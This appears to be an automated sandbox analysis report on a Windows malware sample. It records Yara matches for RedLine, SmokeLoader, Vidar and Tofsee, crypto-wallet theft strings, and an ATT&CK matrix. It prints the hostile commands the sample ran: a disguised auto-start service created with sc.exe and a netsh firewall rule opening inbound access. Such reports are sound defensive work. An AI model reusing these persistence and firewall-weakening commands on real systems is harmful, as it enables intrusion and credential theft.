                      Source: 31.0.8058.exe.d00000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 31.0.8058.exe.d00000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 31.0.8058.exe.d00000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 31.0.8058.exe.d00000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 31.0.8058.exe.d00000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 31.0.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeProcess created: C:\Users\user\Desktop\GNXG5XLBEH.exe "C:\Users\user\Desktop\GNXG5XLBEH.exe"
                      Source: C:\Users\user\AppData\Roaming\ttfssdiProcess created: C:\Users\user\AppData\Roaming\ttfssdi C:\Users\user\AppData\Roaming\ttfssdi
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6604 -ip 6604
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 520
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeProcess created: C:\Users\user\AppData\Local\Temp\6B9B.exe C:\Users\user\AppData\Local\Temp\6B9B.exe
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ceaplexz\
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ceaplexz "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ceaplexz
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess created: C:\Users\user\AppData\Local\Temp\8058.exe C:\Users\user\AppData\Local\Temp\8058.exe
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: explorer.exe, 00000004.00000000.279647475.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.291979845.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.278080230.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.288173104.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.295925695.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.255131979.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.263975759.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.271452394.0000000001640000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.355603743.0000000000CE0000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.357326837.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000004.00000000.288173104.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.255131979.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.271452394.0000000001640000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.355603743.0000000000CE0000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.357326837.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000004.00000000.288173104.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.255131979.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.271452394.0000000001640000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.355603743.0000000000CE0000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.357326837.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: explorer.exe, 00000004.00000000.287836903.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.271133423.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.254965635.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
                      Source: explorer.exe, 00000004.00000000.288173104.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.255131979.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.271452394.0000000001640000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.355603743.0000000000CE0000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.357326837.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: explorer.exe, 00000004.00000000.288173104.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.255131979.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.271452394.0000000001640000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.355603743.0000000000CE0000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.357326837.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8058.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0041A10A __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,Ge
tVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0041A10A __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,Ge
tVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Uses netsh to modify the Windows network and firewall settings
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Changes security center settings (notifications, updates, antivirus, firewall)
                      Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Modifies the windows firewall
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 0000000C.00000002.543329250.0000028374902000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      Yara detected RedLine Stealer
                      Source: Yara match | File source: 31.2.8058.exe.412f910.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.8058.exe.412f910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000002E.00000000.418486488.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000000.417444155.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.423233100.0000000004011000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000000.416967555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000000.417943982.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoader
                      Source: Yara match | File source: 23.2.6B9B.exe.6415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.0.6B9B.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.0.6B9B.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.1.6B9B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.1.ttfssdi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.ttfssdi.6015a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.6B9B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.GNXG5XLBEH.exe.6d15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.1.GNXG5XLBEH.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.GNXG5XLBEH.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.ttfssdi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.0.6B9B.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000001A.00000002.375596550.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.375811349.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.354285300.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.303363186.0000000000470000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.354370443.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000000.288599943.00000000030E1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.303673269.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected Vidar stealer
                      Source: Yara match | File source: 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 6BA5.exe PID: 1412, type: MEMORYSTR
                      Yara detected Tofsee
                      Source: Yara match | File source: 45.2.svchost.exe.2ee0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.3.77CC.exe.2190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 45.2.svchost.exe.2ee0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 43.3.evjgtzc.exe.620000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.77CC.exe.2170e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 43.2.evjgtzc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 43.2.evjgtzc.exe.660000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 43.2.evjgtzc.exe.660000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.77CC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.77CC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 43.2.evjgtzc.exe.600e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 43.2.evjgtzc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000002B.00000003.399149809.0000000000620000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002B.00000002.401571286.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000002.396801518.0000000002170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002B.00000002.402320315.0000000000660000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000002.395583768.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000002.552204136.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000003.371626952.0000000002190000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002B.00000002.402219986.0000000000600000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 77CC.exe PID: 5196, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: evjgtzc.exe PID: 4876, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4020, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp | String found in binary or memory: ElectrumLTC
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp | String found in binary or memory: ElectronCash
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp | String found in binary or memory: Jaxx Liberty
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp | String found in binary or memory: info.seco
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp | String found in binary or memory: \Exodus\
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp | String found in binary or memory: passphrase.json
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp | String found in binary or memory: \Ethereum\
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp | String found in binary or memory: Exodus
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp | String found in binary or memory: default_wallet
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp | String found in binary or memory: MultiDoge
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp | String found in binary or memory: seed.seco
                      Source: 6BA5.exe, 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp | String found in binary or memory: keystore

                      Remote Access Functionality:

                      Yara detected RedLine Stealer (same Yara match sources as listed under Stealing of Sensitive Information)
                      Yara detected SmokeLoader (same Yara match sources as listed under Stealing of Sensitive Information)
                      Yara detected Vidar stealer (same Yara match sources as listed under Stealing of Sensitive Information)
                      Yara detected Tofsee (same Yara match sources as listed under Stealing of Sensitive Information)
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: 30_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                      Mitre Att&ck Matrix

                      Numbers in parentheses are the signature counts shown next to each technique in the matrix.

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts (1) | Windows Management Instrumentation (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (311) | Input Capture (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (11) | Exfiltration Over Other Network Medium | Web Service (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API (531) | Valid Accounts (1) | Valid Accounts (1) | Deobfuscate/Decode Files or Information (11) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (14) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Exploitation for Client Execution (1) | Windows Service (14) | Access Token Manipulation (1) | Obfuscated Files or Information (3) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Input Capture (1) | Automated Exfiltration | Encrypted Channel (22) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | Command and Scripting Interpreter (3) | Logon Script (Mac) | Windows Service (14) | Software Packing (43) | NTDS | System Information Discovery (237) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Standard Port (1) | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Service Execution (3) | Network Logon Script | Process Injection (713) | Timestomp (1) | LSA Secrets | Query Registry (1) | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol (4) | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading (1) | Cached Domain Credentials | Security Software Discovery (581) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol (35) | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion (1) | DCSync | Process Discovery (2) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading (131) | Proc Filesystem | Virtualization/Sandbox Evasion (241) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Valid Accounts (1) | /etc/passwd and /etc/shadow | Application Window Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation (1) | Network Sniffing | System Owner/User Discovery (1) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
                      Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Virtualization/Sandbox Evasion (241) | Input Capture | Remote System Discovery (1) | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
                      Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Process Injection (713) | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery
                      Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Hidden Files and Directories (1) | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | | | Defacement

                      Behavior Graph

                      [Behavior graph image not reproduced. Behavior Graph ID: 553366, Sample: GNXG5XLBEH.exe, Startdate: 14/01/2022, Architecture: WINDOWS, Score: 100.]
